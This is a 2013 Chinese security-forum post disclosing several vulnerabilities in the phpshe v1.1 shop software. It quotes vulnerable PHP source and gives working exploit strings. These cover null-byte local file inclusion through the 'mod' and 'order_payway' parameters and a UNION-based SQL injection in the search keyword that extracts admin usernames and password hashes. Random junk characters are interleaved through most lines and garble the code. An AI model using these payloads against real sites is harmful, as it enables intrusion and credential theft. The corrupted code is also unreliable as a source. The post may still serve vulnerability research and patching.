中国网络渗透测试联盟

标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell [打印本页]
作者: admin    时间: 2013-4-16 16:45
标题: phpshe v1.1多处SQL注入和文件包含漏洞Getshell
/*******************************************************/
$ Z- l: q9 f3 `7 S" Y7 U; n$ Q/* Phpshe v1.1 Vulnerability" `# B7 P0 {. Y+ o: [0 l! j- g
/* ========================
  y- }( n# e* ~2 N, y! s& d, n' u/* By: : Kn1f39 e8 ^' f5 w& P( d( H5 R
/* E-Mail : 681796@qq.com% C; \$ i: X/ Q( `
/*******************************************************/
' v8 M9 D* N8 U8 i0 v6 x' s, P0×00 整体大概参数传输( ?, m6 q: R5 d+ x: r5 L
; t7 [1 b8 d& `2 A! I/ e

/ h* U0 r1 {+ Z+ C: w7 i( B$ f. H3 c2 P/ m* r
//common.php1 }0 b. L0 F$ |- B" B
if (get_magic_quotes_gpc()) {. `! y! y3 Q( o) r& @3 `- i
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
$ Y+ o, a$ o- w1 E1 Y7 U!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');* [8 X$ ]2 n8 u. W
}
0 Z1 y8 C, q4 a! e" D- delse {3 ?% |) J. u' S5 M4 k5 y: z
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');7 q: v" u3 y  a9 g( p2 y8 O# S
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
& o6 Q2 }9 C, L0 L+ x, E. X! y}' m8 Y" N" u6 Z4 i, V3 ^) l2 }6 S. w
session_start();, x/ P% B" a6 |  K7 j3 y$ C
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
* a* y9 U+ A* F6 r9 q  o8 q/ h9 e8 }0 i& D" A!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
* f5 i/ a0 g( s# k1 C8 m7 k$ a# h$ L% S* N, U
0×01 包含漏洞
+ s% ?5 u' g$ P - J1 w% y' \1 ^# r! ]

( D: [  g& Z& p9 Q//首页文件
( B1 G( b) C! r1 K<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
# k4 n7 F2 a. P$ N; pinclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
) R! y" ]% B. _pe_result();
" W3 B" _6 O6 y0 L?>: }( X. G8 c3 @  w: Q" T  o
//common 文件 第15行开始
4 j. m* y6 p1 ?url路由配置+ _* N$ T1 B; r$ Z
$module = $mod = $act = 'index';) p# M( Q0 ?+ a0 U) ^9 ]: P
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
2 b2 ^$ e7 i9 B7 l1 T/ }& \9 P$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
. E" I) M! r" u4 m" X& s$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
- W. R+ I" o( j* S5 j. h6 K//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00+ V# [+ W& U: \# E" `6 }

9 e: i1 O" S1 P2 c7 t  f' w

6 F+ C+ L. r: {: W0 |+ o 0×02 搜索注入$ ~7 ]5 R+ x, \, r1 l$ m

2 h) y, w4 t9 w" w3 |1 v<code id="code2">

//product.php文件
8 a( y7 I# C1 y6 S2 W. }) ^case 'list':
1 f8 h6 U8 `' @8 b$category_id = intval($id);
  z1 u1 z  J1 j$ i5 s. F$info = $db->pe_select('category', array('category_id'=>$category_id));5 l8 Q. V. J0 ^8 q4 ^2 W  t
//搜索
4 \9 m) i/ [" A! X( @1 k$ R$sqlwhere = " and `product_state` = 1";
( X8 c* W" R  @% R# \2 Ape_lead('hook/category.hook.php');2 x' A9 w2 r; H$ {2 r$ l
if ($category_id) {
% n' o3 Q# D6 e9 ]: ^" I- Z0 Swhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
3 b4 ~4 E  n: d$ Z}
$ y: k) `- |% Z9 ^" M- x4 q  V: q$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
9 I2 c4 w! S5 c# k4 L  mif ($_g_orderby) {6 t7 }$ `  N+ `1 O- D9 P9 Y+ d
$orderby = explode('_', $_g_orderby);
0 w# E- i) |! q4 b+ _9 n$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";9 x" G: ]+ `4 N; V, j
}; U+ U) y, }1 g7 [5 a
else {
/ W" D. B2 d4 g$ r$sqlwhere .= " order by `product_id` desc";* v! l4 e" M$ _3 A* [
}
4 f- r0 k( d: x! S/ c' a$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
7 n4 [/ t- G  g: d. H1 R2 x; |& F5 S( |//热卖排行
& a  ~0 ]% b) {9 d( j$product_hotlist = product_hotlist();
) f1 D/ w3 U8 h; t  p8 |//当前路径% ?. |$ e) H5 R, {8 z
$nowpath = category_path($category_id);  ^+ f6 J$ g" f2 f2 @) I
$seo = pe_seo($info['category_name']);
+ S. x7 w) F/ k2 @, `include(pe_tpl('product_list.html'));7 b2 E: d- a* a2 K" G
//跟进selectall函数库
9 A" \& V4 S3 \: A7 [. R9 bpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())+ u& u2 q- o7 H& @
{
/ S: e  s& E8 Q) m//处理条件语句
8 F( J5 W8 Z; E$sqlwhere = $this->_dowhere($where);) k0 D, X0 K/ k: p! p
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);0 N# f2 q: ?7 @7 ]! ~: t
}
$ X$ [" X, ]+ t- K0 u1 d8 j) f3 O//exp
$ p* P8 h0 F3 B: r) J4 p1 Wproduct/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='10 Z$ g/ b. A/ w' L: A0 r

</code>
& A) x4 F$ B$ y9 P4 c# D! p6 H 7 v8 b3 |1 }* U9 p' n. q
0×03 包含漏洞2
1 q; V( j0 ^* f5 C ' }& P# N! E! D- f
<code id="code3">

//order.php

case 'pay':


6 J7 d5 S  I) l3 p% ^+ a$order_id = pe_dbhold($_g_id);

! N7 f1 s' `/ y- c. g
$cache_payway = cache::get('payway');

9 C% U& r# u  f9 y7 c$ a
foreach($cache_payway as $k => $v) {


* V; b7 V. p, I# r; a& ~$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


" g+ \3 c% ]! `1 S- Aif ($k == 'bank') {

& [+ m- p/ r  u# c* @
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

( i/ X9 j2 P, ]
}


: l. @; N8 P# x, C% i}


8 s# p$ e+ ^7 O7 U; U: \3 [0 U7 b$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));


0 L1 }* ], {1 u!$order['order_id'] && pe_error('订单号错误...');

6 ~9 v/ E, O3 v
if (isset($_p_pesubmit)) {


9 _, M1 |  w% Yif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

7 O% m6 H8 p- M' C, i
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


+ f8 {2 N& m7 I# D; tforeach ($info_list as $v) {

. L; ^$ M) ~1 N" @) @' I1 }! x" i
$order['order_name'] .= "{$v['product_name']};";& b1 x7 g/ i/ U& u+ l8 E


% B  B+ u8 ~1 O}


* ]& r# I4 f$ d3 l! C2 }7 z6 decho '正在为您连接支付网站,请稍后...';


5 k* r( Q& K" p! yinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

  e# [- Z% k5 F1 A& B
}//当一切准备好的时候就可以进行"鸡肋包含了"

. M) Q2 D' T  R, V( B* e% |
else {

7 k8 |% Q/ v+ s7 [. }: [& K
pe_error('支付错误...');

' m9 m3 _2 ^1 Z- x! ^: w
}

. M' c  b6 {( ^! H) ]
}

+ `% P3 ^4 Q# ~; }$ |1 B
$seo = pe_seo('选择支付方式');

. l  v; o% g9 D
include(pe_tpl('order_pay.html'));

/ H3 @  {2 R: f/ H# F3 Q" D
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
' ]/ V" _) ~- Shttp://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2